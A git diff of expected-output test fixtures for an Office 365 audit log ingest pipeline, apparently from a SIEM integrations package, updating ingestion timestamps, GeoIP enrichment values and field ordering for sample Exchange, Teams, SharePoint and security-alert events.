@@ -808,7 +808,7 @@ "ip": "::1" }, "event": { - "ingested": "2021-12-09T13:42:42.659974700Z", + "ingested": "2021-12-14T14:49:39.335748733Z", "original": "{\"ClientIP\":\"::1\",\"ClientIPAddress\":\"::1\",\"ClientInfoString\":\"Client=WebServices;Action=ConfigureGroupMailbox\",\"CreationTime\":\"2020-02-17T17:12:03\",\"ExternalAccess\":true,\"Id\":\"284dfe85-ab53-48ad-0863-08d7b3cc81f7\",\"InternalLogonType\":1,\"Item\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"ParentFolder\":{\"Id\":\"LgAAAACklF6sEsJgSK/ulVd531/WAQCzgXIUnq3lQqXFeCmxHwmHAAAAAAENAAAC\",\"MemberRights\":\"ReadAny, Create, EditOwned, DeleteOwned, EditAny, DeleteAny, Visible, FreeBusySimple, FreeBusyDetailed\",\"MemberSid\":\"S-1-8-640184314-1174341437-2555636127-1766693009-0\",\"MemberUpn\":\"Owner@local\",\"Name\":\"Calendar\",\"Path\":\"\\\\Calendar\"}},\"LogonType\":1,\"LogonUserSid\":\"S-1-5-18\",\"MailboxGuid\":\"26286ffa-073d-45ff-9fe9-539891984d69\",\"MailboxOwnerMasterAccountSid\":\"S-1-5-10\",\"MailboxOwnerSid\":\"S-1-5-21-3422892061-1135328251-2670905592-26680073\",\"MailboxOwnerUPN\":\"SIEMTest@testsiem.onmicrosoft.com\",\"Operation\":\"ModifyFolderPermissions\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"OrganizationName\":\"testsiem.onmicrosoft.com\",\"OriginatingServer\":\"AM6PR01MB4535 (67.43.156.13)\\n\",\"RecordType\":2,\"ResultStatus\":\"Succeeded\",\"UserId\":\"S-1-5-18\",\"UserKey\":\"S-1-5-18\",\"UserType\":2,\"Version\":1,\"Workload\":\"Exchange\"}", "code": "ExchangeItem", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json index dc54941893b..88e9f7fbbcc 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ip-formats-events.json-expected.json @@ -26,7 +26,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978949100Z", + "ingested": "2021-12-14T14:49:40.627655470Z", "original": "{\"ClientIP\":\"[10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -71,7 +71,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978959100Z", + "ingested": "2021-12-14T14:49:40.627658808Z", "original": "{\"ClientIP\":\"10.11.12.13:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -114,7 +114,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978963500Z", + "ingested": "2021-12-14T14:49:40.627659344Z", "original": "{\"ClientIP\":\"10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -157,7 +157,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978967600Z", + "ingested": "2021-12-14T14:49:40.627659813Z", "original": "{\"ClientIP\":\"::ffff:10.11.12.13\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -202,7 +202,7 @@ "ip": "10.11.12.13" }, "event": { - "ingested": "2021-12-09T13:42:43.978971100Z", + "ingested": "2021-12-14T14:49:40.627660334Z", "original": "{\"ClientIP\":\"[::ffff:10.11.12.13]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -245,24 +245,18 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "port": 12345, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-12-09T13:42:43.978975700Z", + "ingested": "2021-12-14T14:49:40.627660793Z", "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -304,23 +298,17 @@ "source": { "geo": { "continent_name": "Europe", - "country_name": "Denmark", + "country_name": "Norway", "location": { "lon": 10.0, - "lat": 56.0 + "lat": 62.0 }, - "country_iso_code": "DK" - }, - "as": { - "number": 62121, - "organization": { - "name": "Christian Ebsen ApS" - } + "country_iso_code": "NO" }, "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "event": { - "ingested": "2021-12-09T13:42:43.978981800Z", + "ingested": "2021-12-14T14:49:40.627661244Z", "original": "{\"ClientIP\":\"2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -354,7 +342,7 @@ "domain": "[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]" }, "event": { - "ingested": "2021-12-09T13:42:43.978987800Z", + "ingested": "2021-12-14T14:49:40.627661689Z", "original": "{\"ClientIP\":\"[2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -385,7 +373,7 @@ "domain": "[10.11.12.13]" }, "event": { - "ingested": "2021-12-09T13:42:43.978993800Z", + "ingested": "2021-12-14T14:49:40.627662187Z", "original": "{\"ClientIP\":\"[10.11.12.13]\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -416,7 +404,7 @@ "domain": "localhost" }, "event": { - "ingested": "2021-12-09T13:42:43.978999700Z", + "ingested": "2021-12-14T14:49:40.627662646Z", "original": "{\"ClientIP\":\"localhost\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -447,7 +435,7 @@ "domain": "[localhost]:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979005600Z", + "ingested": "2021-12-14T14:49:40.627663101Z", "original": "{\"ClientIP\":\"[localhost]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -478,7 +466,7 @@ "domain": "localhost:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979012Z", + "ingested": "2021-12-14T14:49:40.627663734Z", "original": "{\"ClientIP\":\"localhost:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -509,7 +497,7 @@ "domain": "[cool.client.local]:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979018Z", + "ingested": "2021-12-14T14:49:40.627664186Z", "original": "{\"ClientIP\":\"[cool.client.local]:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -540,7 +528,7 @@ "domain": "cool.client.local" }, "event": { - "ingested": "2021-12-09T13:42:43.979024Z", + "ingested": "2021-12-14T14:49:40.627664701Z", "original": "{\"ClientIP\":\"cool.client.local\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", @@ -571,7 +559,7 @@ "domain": "cool.client.local:12345" }, "event": { - "ingested": "2021-12-09T13:42:43.979030Z", + "ingested": "2021-12-14T14:49:40.627665148Z", "original": "{\"ClientIP\":\"cool.client.local:12345\",\"CreationTime\":\"2020-02-17T17:12:03\",\"Id\":\"3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226\",\"RecordType\":-1}", "kind": "event", "id": "3be78a31-dbd3-4c2c-eaf9-08d7b3cc8226", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json index 445df521aee..de766073faa 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-ms-teams-events.json-expected.json @@ -25,7 +25,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905415600Z", + "ingested": "2021-12-14T14:49:41.313667872Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"49fa9883-50a9-4c9c-8e12-57e0948a9d8a\",\"Operation\":\"TeamCreated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"Application\",\"UserKey\":\"\",\"UserType\":5,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -54,9 +54,6 @@ } }, { - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "RecordType": "25", @@ -113,7 +110,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905426400Z", + "ingested": "2021-12-14T14:49:41.313670760Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:47\",\"Id\":\"3a951c24-3214-5529-b2fe-097628a39ecd\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"David\",\"Role\":1,\"UPN\":\"david@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Chuck\",\"Role\":1,\"UPN\":\"chuck@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Bob\",\"Role\":1,\"UPN\":\"bob@testsiem.onmicrosoft.com\"},{\"DisplayName\":\"Alice\",\"Role\":1,\"UPN\":\"alice@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -137,14 +134,14 @@ "email": "asr@testsiem.onmicrosoft.com", "domain": "testsiem.onmicrosoft.com" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "SIEMTest" } }, { - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "RecordType": "25", @@ -183,7 +180,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905434200Z", + "ingested": "2021-12-14T14:49:41.313671288Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:44\",\"Id\":\"3350cfd2-1020-5b11-99d8-2701f3a29ea3\",\"ItemName\":\"SIEMTest\",\"Members\":[{\"DisplayName\":\"Alan Smithee\",\"Role\":2,\"UPN\":\"asr@testsiem.onmicrosoft.com\"}],\"Operation\":\"MemberAdded\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"TeamGuid\":\"19:5ad83cb367fc48358e759dccff238f46@thread.skype\",\"TeamName\":\"SIEMTest\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", @@ -207,6 +204,9 @@ "email": "asr@testsiem.onmicrosoft.com", "domain": "testsiem.onmicrosoft.com" }, + "tags": [ + "preserve_original_event" + ], "group": { "name": "SIEMTest" } @@ -241,7 +241,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:44.905438900Z", + "ingested": "2021-12-14T14:49:41.313671713Z", "original": "{\"CreationTime\":\"2020-02-17T16:59:34\",\"Id\":\"d7636db2-859f-437e-8dff-573726578ad7\",\"ObjectId\":\"Unknown (Unknown)\",\"Operation\":\"TeamsSessionStarted\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":25,\"UserId\":\"bob@testsiem.onmicrosoft.com\",\"UserKey\":\"d0e0cfb0-284d-4b0a-83fe-dd543a1c1ed0\",\"UserType\":0,\"Version\":1,\"Workload\":\"MicrosoftTeams\"}", "code": "MicrosoftTeams", "provider": "MicrosoftTeams", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json index 5c2138c99c5..03c67e559e4 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-parameter-string.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.13" }, "tags": [ @@ -75,7 +87,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:42:45.343188600Z", + "ingested": "2021-12-14T14:49:41.725625601Z", "original": "{\"CreationTime\":\"2021-02-05T09:06:07\",\"Id\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"Operation\":\"UserLoggedIn\",\"OrganizationId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"RecordType\":15,\"ResultStatus\":\"Success\",\"UserKey\":\"21119711-1517-43d4-8138-b537dafad016\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\",\"ClientIP\":\"67.43.156.13\",\"ObjectId\":\"Unknown\",\"UserId\":\"root@testsiem4.onmicrosoft.com\",\"AzureActiveDirectoryEventType\":1,\"ExtendedProperties\": \"-Name \"foo\" -Description \"\" -HoldNames () -PublicFolderLocation () -ExchangeLocationExclusion () -IncludeUserAppContent \"True\" -SharePointLocationExclusion () -Force \"True\" -Language \"\" -SharePointLocation () -ExchangeLocation (\"All\") -ContentMatchQuery \"(c:c)(senderauthor=abc@foo.com)\"\",\"ModifiedProperties\":[],\"Actor\":[{\"ID\":\"21119711-1517-43d4-8138-b537dafad016\",\"Type\":0},{\"ID\":\"root@testsiem4.onmicrosoft.com\",\"Type\":5}],\"ActorContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ActorIpAddress\":\"67.43.156.13\",\"InterSystemsId\":\"df4c6d6c-4551-4f2d-8766-03700dfccb47\",\"IntraSystemId\":\"550ed0e2-27da-4cbc-9fb8-46add4018800\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"Unknown\",\"Type\":0}],\"TargetContextId\":\"48622b8f-44d3-420c-b4a2-510c8165767e\",\"ApplicationId\":\"89bee1f7-5e6e-4d8a-9f3d-ecd601259da7\",\"ErrorNumber\":\"0\"}", "code": "AzureActiveDirectoryStsLogon", "provider": "AzureActiveDirectory", @@ -148,7 +160,7 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "event": { - "ingested": "2021-12-09T13:42:45.343199Z", + "ingested": "2021-12-14T14:49:41.725628038Z", "original": "{\"OriginatingServer\": \"HE1PR0102MB3228 (67.43.156.13)\", \"ClientAppId\": \"\", \"OrganizationName\": \"testsiem.onmicrosoft.com\", \"ObjectId\": \"EURPR01A002.prod.outlook.com/Microsoft Exchange Hosted Organizations/testsiem.onmicrosoft.com/DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}\", \"Parameters\": \"-StartReceivedDate \"4/25/2021 7:00:00 AM\" -EndReceivedDate \"5/27/2021 7:00:00 AM\" -StartExpiresDate \"5/26/2021 7:00:00 AM\" -EndExpiresDate \"6/26/2021 7:00:00 AM\" -PageSize \"100\" -Page \"1\" -MyItems \"True\" -QuarantineTypes (\"Bulk\",\"Spam\",\"Phish\")\", \"Workload\": \"Exchange\", \"OrganizationId\": \"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\", \"CreationTime\": \"2020-02-07T20:49:49\", \"AppId\": \"\", \"UserId\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"UserType\": 3, \"Version\": 1, \"ResultStatus\": \"True\", \"ExternalAccess\": true, \"UserKey\": \"NT AUTHORITY\\SYSTEM (Microsoft.Exchange.ServiceHost)\", \"Operation\": \"Set-Mailbox\", \"Id\": \"1c7412a6-858d-49ff-3f93-08d7ac0f45bf\", \"RecordType\": 1}", "code": "ExchangeAdmin", "provider": "Exchange", diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json index 61c420accc6..ef8813d18c6 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sec-comp-alerts-events.json-expected.json @@ -1,21 +1,6 @@ { "expected": [ { - "rule": { - "reference": [ - "http://example.net/alert", - "http://example.net/info" - ], - "name": "Elevation of Exchange admin privilege", - "ruleset": "User", - "description": "asr@testsiem.onmicrosoft.com", - "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", - "category": "AccessGovernance" - }, - "message": "New alert", - "tags": [ - "preserve_original_event" - ], "o365": { "audit": { "Status": "Active", @@ -46,8 +31,20 @@ "name": "mytenant.onmicrosoft.com", "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, + "rule": { + "reference": [ + "http://example.net/alert", + "http://example.net/info" + ], + "name": "Elevation of Exchange admin privilege", + "ruleset": "User", + "description": "asr@testsiem.onmicrosoft.com", + "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", + "category": "AccessGovernance" + }, + "message": "New alert", "event": { - "ingested": "2021-12-09T13:42:45.620853800Z", + "ingested": "2021-12-14T14:49:42.032344887Z", "original": "{\"AlertEntityId\":\"asr@testsiem.onmicrosoft.com\",\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/alert\"},{\"AlertLinkHref\":\"http://example.net/info\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"etype\\\":\\\"User\\\",\\\"eid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"ts\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T18:54:45.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"tdc\\\":\\\"1\\\",\\\"suid\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ut\\\":\\\"Admin\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\"}\",\"EntityType\":\"User\",\"Id\":\"448854d7-81f6-4a06-d31a-08d7b1c1fb2f\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"asr@testsiem.onmicrosoft.com\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -64,21 +61,12 @@ }, "user": { "id": "SecurityComplianceAlerts" - } - }, - { - "rule": { - "reference": [ - "http://example.net/single" - ], - "name": "Elevation of Exchange admin privilege", - "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", - "category": "AccessGovernance" }, - "message": "New alert", "tags": [ "preserve_original_event" - ], + ] + }, + { "o365": { "audit": { "Status": "Active", @@ -109,8 +97,17 @@ "name": "mytenant.onmicrosoft.com", "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, + "rule": { + "reference": [ + "http://example.net/single" + ], + "name": "Elevation of Exchange admin privilege", + "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", + "category": "AccessGovernance" + }, + "message": "New alert", "event": { - "ingested": "2021-12-09T13:42:45.620863900Z", + "ingested": "2021-12-14T14:49:42.032347664Z", "original": "{\"AlertId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[{\"AlertLinkHref\":\"http://example.net/single\"}],\"AlertType\":\"System\",\"Category\":\"AccessGovernance\",\"Comments\":\"New alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"f3u\\\":\\\"asr@testsiem.onmicrosoft.com\\\",\\\"ts\\\":\\\"2020-02-14T18:45:00.0000000Z\\\",\\\"te\\\":\\\"2020-02-14T19:00:00.0000000Z\\\",\\\"op\\\":\\\"GrantAdminPermission\\\",\\\"wl\\\":\\\"Exchange\\\",\\\"tid\\\":\\\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\\\",\\\"tdc\\\":\\\"1\\\",\\\"reid\\\":\\\"23a5e271-e297-4f35-ff57-08d7b17f5bf2\\\",\\\"rid\\\":\\\"f81f1b69-dc60-4ded-918e-e17d5c73b29f\\\",\\\"cid\\\":\\\"17d51759-88e1-40c1-8df3-20bcf2e43057\\\",\\\"ad\\\":\\\"This alert is triggered when someone in your organization becomes an Exchange admin or gets new Exchange admin permissions -V1.0.0.1\\\",\\\"lon\\\":\\\"GrantAdminPermission\\\",\\\"an\\\":\\\"Elevation of Exchange admin privilege\\\",\\\"sev\\\":\\\"Low\\\"}\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Elevation of Exchange admin privilege\",\"ObjectId\":\"5ba6e029-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"Low\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -127,20 +124,12 @@ }, "user": { "id": "SecurityComplianceAlerts" - } - }, - { - "rule": { - "name": "Phony Malware Alert", - "ruleset": "MalwareFamily", - "description": "Malware/Evil.Malware.B", - "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", - "category": "ThreatManagement" }, - "message": "This is a phony threat alert", "tags": [ "preserve_original_event" - ], + ] + }, + { "o365": { "audit": { "Status": "Active", @@ -171,8 +160,16 @@ "name": "mytenant.onmicrosoft.com", "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, + "rule": { + "name": "Phony Malware Alert", + "ruleset": "MalwareFamily", + "description": "Malware/Evil.Malware.B", + "id": "17d51759-88e1-40c1-8df3-20bcf2e43057", + "category": "ThreatManagement" + }, + "message": "This is a phony threat alert", "event": { - "ingested": "2021-12-09T13:42:45.620869900Z", + "ingested": "2021-12-14T14:49:42.032348169Z", "original": "{\"AlertEntityId\":\"Malware/Evil.Malware.B\",\"AlertId\":\"1233344-8b6e-13bd-b800-08d7b180173c\",\"AlertLinks\":[],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"This is a phony threat alert\",\"CreationTime\":\"2020-02-14T19:00:00\",\"Data\":\"{\\\"something\\\":\\\"blabla\\\"}\",\"EntityType\":\"MalwareFamily\",\"Id\":\"7d6297b5-e4a7-46f0-3c1e-08d7b1c1fb22\",\"Name\":\"Phony Malware Alert\",\"ObjectId\":\"12345678-8b6e-13bd-b800-08d7b180173c\",\"Operation\":\"AlertTriggered\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"PolicyId\":\"17d51759-88e1-40c1-8df3-20bcf2e43057\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"Severity\":\"High\",\"Source\":\"Office 365 Security \\u0026 Compliance\",\"Status\":\"Active\",\"UserId\":\"SecurityComplianceAlerts\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\"}", "code": "SecurityComplianceAlerts", "provider": "SecurityComplianceCenter", @@ -189,7 +186,10 @@ }, "user": { "id": "SecurityComplianceAlerts" - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json index 221a8449059..7895ad7fa36 100644 --- a/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json +++ b/packages/o365/data_stream/audit/_dev/test/pipeline/test-sharepoint-events.json-expected.json @@ -2,6 +2,18 @@ "expected": [ { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -53,7 +65,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:42:45.953082200Z", + "ingested": "2021-12-14T14:49:42.359170961Z", "original": "{\"ClientIP\":\"67.43.156.15\",\"CorrelationId\":\"622b339f-4000-a000-f25f-92b3478c7a25\",\"CreationTime\":\"2020-02-07T16:43:53\",\"CustomUniqueId\":true,\"EventSource\":\"SharePoint\",\"Id\":\"99d005e6-a4c6-46fd-117c-08d7abeceab5\",\"ItemType\":\"Page\",\"ListItemUniqueId\":\"59a8433d-9bb8-cfef-6edc-4c0fc8b86875\",\"ObjectId\":\"https://testsiem-my.sharepoint.com/personal/asr_testsiem_onmicrosoft_com/_layouts/15/onedrive.aspx\",\"Operation\":\"PageViewed\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":4,\"Site\":\"d5180cfc-3479-44d6-b410-8c985ac894e3\",\"UserAgent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 